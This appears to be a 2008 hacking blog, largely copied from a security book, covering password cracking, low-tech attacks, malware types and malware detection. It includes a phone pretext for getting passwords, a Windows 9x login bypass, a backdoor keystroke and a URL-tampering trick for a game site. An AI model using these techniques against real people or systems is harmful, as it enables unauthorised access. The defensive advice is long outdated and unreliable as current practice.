• NTFSDOS Professional (www.winternals.com)

Various other handy password tools exist, such as

• GetPass for decrypting login passwords for Cisco routers (www.
boson.com/promo/utilities/getpass/getpass_utility.htm)

• Win Sniffer for capturing FTP, e-mail, and other types of passwords
off the network

• Cain and Abel for capturing, cracking, and even calculating various
types of passwords on a plethora of systems (www.oxid.it/
cain.html)

You may be wondering what value a password-cracking tool offers if you need
physical access to your systems to test them. Some would say that if a hacker
can obtain physical access to your systems and password files, you have
more than just basic information-security problems to worry about. But this
kind of access is entirely possible!

Password-cracking utilities take a set of known passwords and run them
through a password-hashing algorithm. The resulting hashes — or an
encrypted form of a data set — are then compared at lightning speed to the
password hashes extracted from the original password database. When a
match is found between the newly generated hash and the hash in the original
database, the password has been cracked. It’s that simple.

Other password-cracking programs simply attempt to logon using a predefined
set of user IDs and passwords. In fact, NAT can do just that. NAT takes
advantage of some known weaknesses in Microsoft’s Server Message Block
(SMB) protocol, which is used for file and print sharing.

Try running NAT in a real-world scenario. Simply download NAT from the preceding
address, and extract it to a temporary directory on your hard drive.
NAT comes with some predefined usernames and passwords in the userlist.txt and passlist.txt files, but you can modify them or add your own.

Two high-tech password-cracking methods are dictionary attacks and bruteforce
attacks.

Dictionary attacks

Dictionary attacks against passwords quickly compare a set of words —
including many common passwords — against a password database. This
database is a text file with thousands of words typically listed in alphabetical
order. For instance, suppose that you have a dictionary file that you downloaded
from one of the sites in the following list. The English dictionary file at
the Purdue site contains one word per line starting with 10th, 1st . . . all the
way to zucchini and zygote.
Many password-cracking utilities can use a separate dictionary that you
create or download from the Internet.

Most dictionary attacks are good for weak (easily guessed) passwords.
However, some special dictionaries have common misspellings of words such
as pa$w0rd (password) and 5ecur1ty (security), non-English words, and thematic
words from religions, politics, or Star Trek.

Brute-force attacks

Brute-force attacks can crack any password, given sufficient time. Brute-force
attacks try every combination of numbers, letters, and special characters
until the password is discovered. Many password-cracking utilities let you
specify such testing criteria as the characters and password length to try.
A brute-force test can take quite a while, depending on the number of accounts,
their associated password complexities, and the speed of the computer that’s
running the cracking software.

For Low tech password cracking technique click here.

For Vulnerability for password cracking read this article .

How to choose good password click here ..

Cracking passwords

2008-12-15T06:35:00.000-08:00

A hacker can use low-tech methods to crack passwords. These methods
include using social-engineering techniques, shoulder surfing, and simply
guessing passwords from information that you know about the user.

Social engineering

Social engineering takes advantage of the trusting nature
of human beings to gain information that can later be used maliciously.
Techniques
To obtain a password through social engineering, you just ask for it. For
example, you can simply call a user and tell him that he has some importantlooking
e-mails stuck in the mail queue and you need his password to log in
and free them up. This is how hackers try to get the information!
If your colleague gives you his password, make sure that he changes it.

Countermeasures
User awareness is the best defense against social engineering. Train users
to spot attacks (such as suspicious phone calls or deceitful e-mails) and
respond effectively. Their best response is to not give out any information
and to alert the appropriate information-security officer in the organization
to see whether the inquiry is legitimate and whether a response is necessary.
For this defense to be successful, the organization must enforce a security
policy and provide ongoing security-awareness training to users.

Shoulder surfing

Shoulder surfing is an effective, low-tech password hack.

Techniques
To mount this attack, you must be near the user and not look obvious. Simply
watch either the user’s keyboard or screen when logging in.
A hacker with a good eye may watch whether the user is glancing around his
desk for either a reminder of the password or the password itself.
Many folks have experienced shoulder surfing at the grocery-store checkout
line. You swipe your debit card to pay for your chips and dip; you enter your
PIN to authorize the transaction; and before you know it, the guy in line
behind you has your PIN! He simply watched you enter it into the keypad.
You can try shoulder surfing yourself — though preferably not in the grocerystore
checkout line. Just walk around the office and perform random spot
checks. Go to users’ desks, and ask them to log in to their computers, the
network, or even their e-mail applications. Just don’t tell them what you’re
doing beforehand, or they’ll be on to you and attempt to hide what they’re
typing or where they’re looking for their password — two things that they
should’ve been doing all along!

Countermeasures
Encourage users to be aware of their surroundings and not enter their passwords
when they suspect that someone is looking over their shoulder.
Instruct users that if they suspect someone is looking over their shoulder
while they’re logging in, they should politely ask the person to look away.

Inference

Inference is simply guessing passwords from information you know about
users — such as their date of birth, favorite television show, and phone numbers.
It sounds silly, but you can determine passwords by guessing!
The best defense against an inference hack attack is to educate users about
creating secure passwords that do not include information that can be associated
with them. You can’t easily enforce this practice with technical controls,
so you need a sound security policy and ongoing awareness training to
remind users of the importance of secure password creation.

Weak authentication

Hackers can obtain — or simply avoid having to use — passwords by taking
advantage of older operating systems, such as Windows 9x and Me. These
operating systems don’t require passwords to log in.

Bypassing authentication
On a Windows 9x or similar workstation that’s prompting for a password, you
can press Esc on the keyboard to get right in. After you’re in, you can find
other passwords stored in such places as dial-up networking connections
and screen savers. These weak systems can serve as trusted machines —
meaning that it’s assumed that they’re secure — and provide good launching
pads for network-based password attacks as well.

Countermeasures
The only true defense against this hack is to not use operating systems that
employ weak authentication. To eliminate this vulnerability, upgrade to
Windows XP, or use Linux or the flavors of UNIX, including Mac OS X.
More modern authentication systems (such as Kerberos, which is used in
newer versions of Windows), directory services (such as Novell’s eDirectory),
and network-based e-mail systems (such as Exchange) encrypt user passwords
or don’t communicate the passwords across the network.

For High tech password cracking click here.

For knowing vulnerability of password cracking click here .

How to choose a good password click here ...

All About Passowrd Cracking and countermeasures

2008-12-15T06:29:00.000-08:00

How to choose good password .

Types of Malwares (Must Know)

2008-12-15T04:17:00.001-08:00

Most malware is platform-specific: It targets specific operating systems, applications,
and vulnerabilities to spread more quickly.

Trojan horses

Trojan horses — named after the infamous Greek wooden horse used to penetrate the city of Troy .
Trojan are executable files, often transmitted via e-mail, that masquerade as legitimate programs but actually perform malicious acts.

Trojan-horse code works in the background — doing things like deleting information,
gathering passwords, and capturing keystrokes — while a legitimatelooking program, such as a screen saver or game, runs in the foreground.

Many Trojans — called remote-access Trojans, or RATs — set up backdoors on the systems they infect, allowing hackers to access them remotely and control them from across the Internet. Many Trojans aren’t detected by antivirus programs. With all things being equal (and antivirus software running), this is the malware you should be afraid of. Some common RATs are NetBus,
SubSeven, and Back Orifice.

Viruses
Computer viruses are the best-known malware category. Viruses are programs that are often self-replicating — meaning that they can make copies of themselves — and attach to executable files, deleting information and crashing computers whenever a user or other process runs the program. Even PDA viruses exist, some of which drain batteries and call 911 for you — how
thoughtful!

Worms

Worms are self-propagating programs that travel around the Internet at lightning
speed. They load up in memory, effectively exploit known software vulnerabilities,
and often end up crashing the systems.

Rootkits

Rootkits are nasty applications that hackers can use to control a computer completely, with the ultimate prize of crashing the system or stealing information. Rootkits are mostly found on UNIX systems but are becoming popular on the Windows platform. Rootkits are sets of programs that either :-
Masquerade as typical administrator command-line programs
Integrate into the kernel, or core, of the operating system
Kernel-based rootkits, such as Knark for Linux and the FU rootkit for Windows, tie into the actual operating system. With these programs, hackers can

Hide system processes and applications from the Windows Task Manager
or the process list in UNIX

Change the group membership of processes and applications so that a malicious program can run as the system, administrator, or root account

Modify environment variables

Make programs look like they were run by another user, concealing the hacker’s identity in audit logs

Spyware

Spyware programs spy on you and sometimes even capture and transmit
confidential information from your computer. They’re installed as cookies,
Windows Registry entries, and even executables on the local computer.
“Legitimate” spyware that may be installed by an administrator or other
person to watch someone’s computer usage includes SpectorSoft’s eBlaster
and Spector Pro, and TrueActive (formerly known as WinWhatWhere).

These programs are extremely powerful and capture video screen shots, turn
on the local microphone, track Web browsing, and even forward copies of
e-mails sent and received to a third-party address. Powerful and scary!
Adware is similar to spyware but a little less intrusive. It tracks Internet usage
and pulls targeted ads to specific users, based on their habits.

Built-in programming interfaces

Programming interfaces built into operating systems can be used maliciously:

Java applets are programs written in the Sun Microsystems programming
language. Although these programs run in a sandbox — or safe area — to
ensure that the local system is not compromised by malicious code, they
can still cause security problems.

Microsoft .NET applications are programs written based on the new
application framework from Microsoft. Like Java applets, these programs
have their own playpen that helps ensure that malicious code is
not executed.

ActiveX controls are Microsoft-based programs that everyone loves to
hate. ActiveX controls can be executed with minimal effort in such applications
as Internet Explorer, Outlook, and other Microsoft programs.

Their control over a computer can potentially cause serious harm to a
computer system and its stored information.

VBScripts are scaled-down versions of Microsoft’s Visual Basic programming
language. Similar to ActiveX controls, these scripts can wreak
havoc on local data.

Many of the common malware programs traversing the Internet today
are VBScripts.

Windows Script Host (WSH) is a script processor built into Windows —
similar to DOS batch files — that can be used to perform malicious acts.

JavaScript programs, which are similar to ActiveX and VBScripts, are
written in Netscape’s scripting language. They can cause computers
harm if users willingly run them within Web browsers and e-mails.
Not all applications written in these programming interfaces are malicious.
Many legitimate programs are used every day that run just fine and don’t do
any harm.

Logic bombs

A logic bomb is a program — often, an automated script using regular network
administration tools — that is scheduled to run when it’s triggered by a certain
event, such as someone’s logging in, or run on a specific date or time, such as
two weeks after an employee is let go.

Logic bombs are a common way for disgruntled employees to seek revenge
on their former employers. Some logic bombs have destroyed entire databases
of information, including the famous logic bomb planted by Tim Lloyd
at Omega Engineering a few years back. This program erased all the information
from the company’s NetWare server, putting a stop to its manufacturing
processes. This event resulted in $10 million in damages to the company, and
ultimately, 80 employees got laid off.

Security tools

Your own security tools can be used against you. This includes the following
tools:

Vulnerability scanners, such as Nessus and even the tried-and-true
Netcat tool, can place backdoors in your systems.

Network analyzers, including the ARP poisoning tools ettercap and
dsniff.

Application Hacking

The DOS debug program that still ships with Windows.

The NetWare debugger backdoor.

You access the backdoor by pressing Shift+Alt+Shift+Esc all at the same
time (using both Shift keys) at the server console.

To Know "how malware propogates " see here...

2008-12-15T03:58:00.000-08:00

Testing

You can carry out various tests to check for malware infections on your network,
as described in the following sections.
Vulnerable malware ports
You should look for Trojan ports when assessing your systems. Here are
some common ones to look out:
1337, 54320, and 54321 (Back Orifice and Back Orifice 2000)
12345 and 12346 (NetBus)
1243 and 27374 (SubSeven)

When testing, look for computers listening on these ports. These port numbers
can usually be changed in most malware applications, so don’t rely on these completely.

Two great Web sites I refer to a lot when I want to see how a particular piece
of malware works are the following:
www.simovits.com/trojans/trojans.html is a comprehensive listing
of Trojan horses.

Manual assessment

It helps to know your systems — what software is installed and what services
are running. Document your baseline environment, if you haven’t already, by using the same methods I describe in this chapter.

If you suspect that one of your systems may be infected by malware, or you
want to see which applications are loaded on your system, there are tools
and techniques you can use. The key here is to search for things that just
don’t look right.

Windows

Because most malware affects Windows, there are various tests specific to that platform you can carry out to test for malware infections.

Odd file names

If you’re unsure what a specific file does or want more details on file-format
and header information, you have a couple of options for information:

Check Wotsit’s Format at www.wotsit.org for information on file formats
and headers.

Search for the filename in Google with both Web and Groups searches.

Netstat

Run netstat -an at a command prompt.
The a option displays all connections and listening ports.

The n option displays IP addresses and port numbers in numeric form to
make them easier to read.

You see something similar to the following list:

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 10.11.12.202:139 0.0.0.0:0 LISTENING
TCP 10.11.12.202:1044 208.215.179.139:80 CLOSE_WAIT
TCP 10.11.12.202:2099 10.11.12.204:139 ESTABLISHED
TCP 10.11.12.202:2100 10.11.12.2:139 TIME_WAIT
UDP 0.0.0.0:445 *:*
UDP 10.11.12.202:137 *:*
UDP 10.11.12.202:138 *:*

The preceding example shows several Microsoft NetBIOS networking ports
(135, 137, 138, 139, and 445) and an HTTP connection in progress (port 80).
The NetBIOS connections may be questionable, but I’ve actually initiated
those connections, so I trust that they’re legitimate.
Look for connections to the following ports to scope out possible malware or
other hacker behavior in progress:

NetBIOS ports

Common malware ports

Ports that can indicate malicious behavior, including telnet (TCP port 23)
and FTP sessions that shouldn’t be occurring (TCP ports 20 and 21)

Port mapping

A port-mapper program shows which applications are actually connected to
the specific open ports.
My favorite port mapper is a free tool called Vision by Foundstone (www.
foundstone.com). I recommend this tool for your toolbox.

Task Manager

Press Ctrl+Alt+Del to load the Windows Task Manager and see whether any
strange applications or processes are loaded.

Many strange-looking processes are legitimate. Make sure that you know what
you’re dealing with, so you don’t stop a legitimate program. A quick Google
search on the filename usually provides enough information. Just because it’s
not there doesn’t mean it’s not loaded, though, because some processes, such
as the FU rootkit for Windows, have the ability to hide themselves.

Net use

You can run net use at a command prompt to see what drives are mapped
to external systems. Look for drive mappings that should not be there.

Registry

Look in your Windows Registry under the following HKEY_LOCAL_MACHINE
(HKLM) keys for strange-looking applications that are loading. This is a
common place for malware to be initiated upon startup.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx

Startup files

Check your Windows startup folder and files such as autoexec.bat and
config.sys in the root directory of the C: drive for any applications that
don’t belong. Unknown programs can signal that a rogue application is configured
to start every time the computer boots.

Linux

For your Linux-based systems, you can run various tests to find out more
about what’s running on your systems.

netstat

Run netstat -at to view active network connections.

In addition, you see that the X11 service for X Window along with the domain service (DNS), sunrpc, and SMTP service for e-mail. Check these types of things before a suspected attack
occurs so that you know what belongs and what doesn’t.

lsof
The lsof utility lists open files, as shown in Figure 14-3, so you can check for
strange connections. This is similar to the Vision program for Windows.

ps
The ps utility displays running processes, as shown in Figure 14-4. You can
check for strange applications that don’t look right.
This is why it helps to know what’s supposed to be loaded!

Startup files
Check your Linux startup files (such as inetd.conf and xinetd.conf) for
any applications that don’t belong. Unknown programs can signal that a
rogue application is configured to start every time the computer boots.

Network card
Determine whether someone or some malware has placed the machine’s network
card into promiscuous mode, indicating the use of a network analyzer.
Enter this line at the command prompt:

ifconfig –a | grep PROMISC

If the return value is not empty, an interface is running in promiscuous mode.
You can enter this command into a cron job that runs every few hours that
can alert you if one is found.

Antivirus software testing

For starters, check whether your antivirus software is actually working.
Before you begin testing your antivirus software, make sure that you have the
latest virus software engine and signatures loaded.

You have a couple of safe options for checking the effectiveness of your
antivirus software, as described in the following two sections. This is by no
means a comprehensive method of testing your malware-protection mechanisms,
but it serves as a good, safe start.

Eicar test string

Eicar is a European-based malware think tank that has worked in conjunction
with malware vendors to provide this basic system test. The eicar test string
is transmitted in the body of an e-mail or as a file attachment so that you can
see how your server and workstations respond. You basically access this file —
which contains the following 68-character string — on your computer to see
whether your antivirus or other malware software detects it:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
You can download a text file with this string from www.eicar.org/anti_
virus_test_file.htm. Several versions of the file are available on this site.
One version is a zip file. I recommend testing with this file to make sure that
your antivirus software can detect malware within compressed files.

GFI’s Email Security Testing Zone

A freebie at www.gfi.com/emailsecuritytest is a good e-mail malware test
to run against your server and clients. This series of tests sends e-mails with
malicious-like scripts in such programming languages as Visual Basic and
ActiveX to check exactly what gets through your e-mail system. These aren’t
malicious tests — just tests that should invoke your antivirus software or
other protective measures on your e-mail server or gateway if your software
is configured and working correctly.

Network scanning

Use Nmap, SuperScan, or your favorite port-scanning tool to check for abnormal
ports open on your network hosts.

Some connections that show as open aren’t necessarily accurate and dependable.
You may need to investigate unknown ports on the systems further by
using a port-mapping tool such as Vision for Windows or lsof for Linux, as
described previously in this chapter.

Using SuperScan, you may find the following results in a quick network scan:
* - 10.10.1.1 fs1
|___ 12345 Win95/NT Netbus backdoor
* - 10.10.1.2 [Unknown]
* - 10.10.1.4 laser
* + 10.10.1.204 PC100
|___ 12345 Win95/NT Netbus backdoor
* + 10.10.1.209 DQ
|___ 12345 Win95/NT Netbus backdoor

You can also use Nmap to find specific malware ports,

I recommend scanning your entire network for spyware with PestPatrol
Auditor’s Edition (www.pestpatrol.com) or a similar program.

Every time I run a full scan on my system, tools are called suspect, and my
software — antivirus software especially — tends to “clean up” those tools
for me. I must either replace my security tools from backup or download and
install them again. If any of your security tools or security testing software
may look like malware on your computer, either

Keep backup copies of the original installation files.

Have your malware-protection software skip the files or directories
where your security tools are installed.

Of course, if an infection is suspected — and periodically, such as once a
month, even when infections aren’t suspected — run your antivirus software
against all the computers on your network. Another tool to double-check your
systems is McAfee’s AVERT Stinger (vil.nai.com/vil/stinger). This standalone
antivirus executable checks for several dozen of the latest common malware
items and known variants of each.

Behavioral-analysis tools

For a neat set of tests to find whether your Windows-based systems are susceptible
to behavioral-based malware attacks — that is, attacks that don’t
match a specific signature, but perform a function such as writing to the local
hard drive — check out the demos at the Finjan Software Test Center at www.
finjan.com/mcrc/sec_test.cfm. These tests — which include “malicious”
executables, JavaScript, ActiveX, and Visual Basic — safely show you just
what can happen without the proper malware protection in place on your
systems.

Malware Countermeasures

You can implement various countermeasures to prevent malware attacks
against your systems, as described in the following sections.
General system administration
Security countermeasures within your organization can help prevent attacks:

Your first and foremost goal should be to keep hackers and malware out
of your systems in the first place. If you perform the other countermeasures
and system-hardening best practices mentioned throughout this
book and referenced in Appendix A, you’re on your way.

Create an incident-response plan. The FedCIRC Incident Handling
Checklists at www.fedcirc.gov/incidentResponse/IHchecklists.
html is a good place to start.

No matter what measures you have in place to protect your systems
from malware infections, you’ll probably be attacked sometime. Plan
ahead so you don’t have to make critical decisions under pressure.

Before deploying networkwide any programs downloaded from the
Internet, test and analyze the programs for malicious behavior on isolated
systems.

Use malware-protection software (such as antivirus, spyware protection,
and Trojan testers).

Two guidelines can increase the effectiveness of your protection:
• Load the software on the layers of your network wherever possible,
including on firewalls, content-filtering servers, e-mail gateways/
firewalls, e-mail servers, and e-mail clients.

• Use different malware-protection applications (from multiple vendors)
or a program that combines the scanning engines of several
antivirus vendors in one fell swoop, such as Antigen from Sybari
Software (www.sybari.com/home).

Apply the latest software patches — especially critical security updates.

Back up critical systems regularly. This could include performing the
following:

• Image or other backup that can be restored quickly in the event of
a serious infection

• Copies and MD5 or SHA checksums of critical executables in case
you need to restore or compare existing ones for authenticity

• Emergency repair disks for critical systems in case of a malware
infection

Enable heuristics protection in your antivirus software, if possible, to
help detect behavioral anomalies that need to be blocked or cleaned.

Never rely on digitally signed code — such as ActiveX controls that
Internet Explorer downloads and prompts you to load — to run properly
on your systems. Digital signatures on this code verify only that it came
from a trustworthy source — not how it actually behaves when it’s
loaded.

Don’t just disable such application interfaces as ActiveX, Windows
Script Host, JavaScript, and Java without a good reason.
All these programming interfaces have some legitimate uses. Applications
can stop working if these interfaces are disabled haphazardly. If the other
security controls I mention here are in place, your systems should be
pretty secure from malware written in these languages. You want to find a
good balance between security and usability for your users so that security
doesn’t get in the way of people doing their jobs.

Make sure that a firewall is always in place on your network. Use it to
look for

• Suspicious ports in use (or trying to be used)

• Heavy traffic patterns that can signal a malware infection

Use IDS and IDP systems to stop potential malware infections in their
tracks when they try to enter your network.

Run a rootkit-detection application:

• Rkdet (vancouver-Webpages.com/rkdet) for Linux checks for
someone installing a rootkit or other malware on your systems.

• chkrootkit (www.chkrootkit.org) tests after the fact for over 50
different installed rootkits on many popular flavors of UNIX.

In addition to the preceding security countermeasures, you can implement
several e-mail–specific malware-protection measures:

Make it policy for users not to open unsolicited e-mails and any attachments
— especially those from unknown senders.

Plan for users who ignore or forget about the policy of leaving unsolicited
e-mails and attachments unopened.
These automatic technical measures can help prevent malware from
infecting user systems:

• At the server or e-mail gateway, filter e-mails that have executable
attachments, such as .com, .exe, .pif, .scr, and .vbs. The File
Extension Source at filext.com has information about more than
8,500 file types.

• Always run antivirus software wherever it can be installed — at the
handheld, desktop, and server levels, if possible.

• Run antivirus software at the server or gateway levels, if possible.
Make sure that encrypted files and emails can be protected against
malware.

• Encryption won’t keep malware out of files or e-mails. You’ll just
have encrypted malware within the files or e-mails.

• Encryption keeps your server or gateway antivirus from detecting
the malware until it reaches the desktop.

Files

You must perform regular malware protective maintenance on your file systems.
The following countermeasures will help:

Periodically scan all possible systems on your network, and enable realtime
malware protection that can’t easily be disabled by users.

Scan all files — not just executable ones — to help prevent unknown
malware issues.

Consider changing file associations for potentially malicious executables,
such as com, .exe, .pif, .scr, and .wsh.

For example, you can change the Windows Script Host file associations
to something like Notepad.exe in case they’re ever launched. That way,
Notepad will load the file instead of the Windows Script Host engine.

How Malware Propofates

2008-12-15T03:55:00.000-08:00

How Malware Propagates

Some time back — practically forever, in computer time — most malware
propagated via floppy disks. In 1981, the first computer virus was released:
the Apple II Elk Cloner virus. In 1986, the first virus that affected the
Microsoft/Intel platform — the Brain virus — was released. Both of these
viruses were floppy-disk–based, but neither packed the punch that many
viruses have come to inflict on their victims since that time.
Some of the first malware exploited vulnerabilities in computer hardware and
software architectures — like what happens today. These old-fashioned viruses
spread very slowly by today’s standards. It could take months and sometimes
years for a few thousand systems to be infected. What’s different about today’s
malware? It’s the method of propagation. The Internet allows malware to
spread around the world quickly. Malware can affect hundreds of thousands
of systems within a few weeks, as happened with the Code Red and Nimda
worms, or within a few minutes, as we saw with the Slammer/Sapphire worm.
Hackers from anywhere in the world can try penetrating your systems — at
their convenience.

Automation

Automated attacks are the wave of the future for malware. The Internet is not
going away. In fact, more systems are going online — more users, more hackers,
and a greater number of applications are emerging that can be affected.
This includes Web services; peer-to-peer (P2P) software, such as instant messaging
(IM); and other file-sharing technologies, such as Gnutella, Kazaa,
Morpheus, and mobile-device applications that run on PDAs and cell phones.

E-mail

The most common malware attack channel is through e-mail. A hacker simply
attaches a virus or Trojan horse to an e-mail — often, through an automated
mechanism — and sends the message to unsuspecting users. This process is
automated with self-propagating worms making an attack even easier. The
text of the e-mail says, “See the attached note” or “Check out this game.”
Many gullible users open the attachment, thinking it’s something that will
brighten up their day. Instead, it’s malware looking to copy or delete local
files and often glean e-mail addresses from the user’s address book to send
itself on to other users. If antivirus software is missing, outdated, or disabled
at the time, this can spell bad news for the computer or network.

Hacker backdoors

Malware is propagated on computer systems by hackers compromising a
host from across the network or Internet, obtaining administrator or root
access by exploiting a known vulnerability and then installing the malware to
their heart’s content. They can set up backdoors, giving them remote access
so they can come back and play in the future.
Many of these infections go unnoticed indefinitely, usually until the network
administrator suspects that something strange is going on, or the system
crashes, or information gets stolen or erased.

For various test u can perform to insure u are safe from all attacks mention this page ....

Types of Malware ( must know )

2008-12-15T03:39:00.000-08:00

Zapak hacking : How To Change Nick Name in Zapak

2008-12-15T02:48:00.000-08:00

Many people requested me to post this trick , well its very simple to change your nick name in zapak all u need is MD5 hash , to get the md5 follow the procedure below ..

First of all download internet browser Firefox.

Now open zapak and login into your account and enter room of any any multiplayer game.

Now open the "History" tab in toolbar menu .

Now look for "user_verified" in history and copy its URL .

Now after coping it, paste it in notepad and u will get some link simply repalce the nick name with any desired nickname and copy the modified link and paste it in address bar of browser and click enter ... and thats it u will find ur nick has been changed with what u have replaced.

How hackers are classified

2008-12-13T21:00:00.000-08:00

Say the word "hacker" and any non-computer person will immediately think of someone who destroys computers. Most people put a hacker on the same shelf as they put the bottle that says something like "hazardous to your health."

We’ve all heard of hackers. Many of us have even suffered the consequences
of hacker actions. So who are these hackers? Why is it important to know
about them? The next few sections give you the lowdown on hackers.

Defining hacker

Traditionally, a hacker is someone who likes to tinker with software or
electronic systems. Hackers enjoy exploring and learning how computer
systems operate. They love discovering new ways to work electronically.

Recently, hacker has taken on a new meaning — someone who maliciously
breaks into systems for personal gain. Technically, these criminals are
crackers (criminal hackers). Crackers break into (crack) systems with
malicious intent. They are out for personal gain: fame, profit, and even
revenge. They modify, delete, and steal critical information, often making
other people miserable.

The good-guy (white-hat) hackers don’t like being in the same category as the
bad-guy (black-hat) hackers. (These terms come from Western movies where
the good guys wore white cowboy hats and the bad guys wore black cowboy
hats.) Whatever the case, most people give hacker a negative connotation.
Many malicious hackers claim that they don’t cause damage but instead are
altruistically helping others. Yeah, right. Many malicious hackers are electronic
thieves.

Hackers (or bad guys) try to compromise computers.

Ethical hackers (or good guys) protect computers against illicit entry.

There is another catagory in hacking culture that is script skiddie.

In hacker culture, a script kiddie, occasionally script bunny, skiddie, script kitty, script-running juvenile (SRJ), or similar) is a derogatory term used to describe those who use scripts or programs developed by others to attack computer systems and networks. It is generally assumed that script kiddies are juveniles who lack the ability to write sophisticated hacking programs or exploits on their own, and that their objective is to try to impress their friends or gain credit in underground hacker communities.

Script kiddies have at their disposal a large number of effective, easily downloadable malicious programs capable of harassing even advanced computers and networks.^[1] Such programs have included WinNuke applications, Back Orifice, NetBus, Sub7, Metasploit, ProRat and often software intended for legitimate security auditing.

Another simple means of attack is a mass mailer worm. These are spread through e-mails and, once opened, they can be automatically sent throughout entire systems, often without the users realizing it. The purpose of a worm varies, from sapping the targeted computer or network of bandwidth and therefore slowing performance, to deleting or encrypting files. Other commands are possible.

In a denial-of-service (DoS) attack, the attacker tries to shut down network activity in a target system by sapping the computer network of bandwidth or other resources. A number of distinct DoS attacks have been created that pursue this goal through different means, such as SYN flood, ICMP flood (a.k.a Smurf attack) and ping floods. If the server gets overwhelmed with excessive amounts of information, it will stop responding, and may require a restart.

Some examples of script skiddies ...

Michael Calce, a.k.a. MafiaBoy, from Montreal, Canada, was arrested in 2000 for using downloaded tools to launch DoS attacks against high-profile Web sites such as Yahoo!, Dell, eBay, and CNN. He was 15 years old at the time. The financial damages were estimated at roughly $7.5 million. He pleaded guilty to 56 criminal charges. On September 12, 2001, Calce appeared before the Montreal Youth Court in Canada and was sentenced to eight months "open custody", one year probation, and restricted use of the Internet.
In 1999, NetBus was used to discredit a law student named Magnus Eriksson studying at the Lund University in Sweden. Child pornography was downloaded onto his computer from an unidentified location. He was later acquitted of charges in 2004 when it was discovered that NetBus had been used to control his computer.
Jeffrey Lee Parson, a.k.a T33kid was an 18-year-old high school student from Minnesota was responsible for spreading a variant of the infamous Blaster computer worm. Parson only modified the original Blaster worm, already prevalent, using a hex editor to add his screen name to the existing executable, and then attached another existing backdoor, Lithium, and posted it on his website. By making this subtle modification, the new executable was considered a variant, and authorities were able to trace the name back to him. The program was part of a DoS attack against computers using the Microsoft Windows operating system. The attack took the form of a SYN flood which caused only minimal damage. He was sentenced to 18 months in prison in 2005.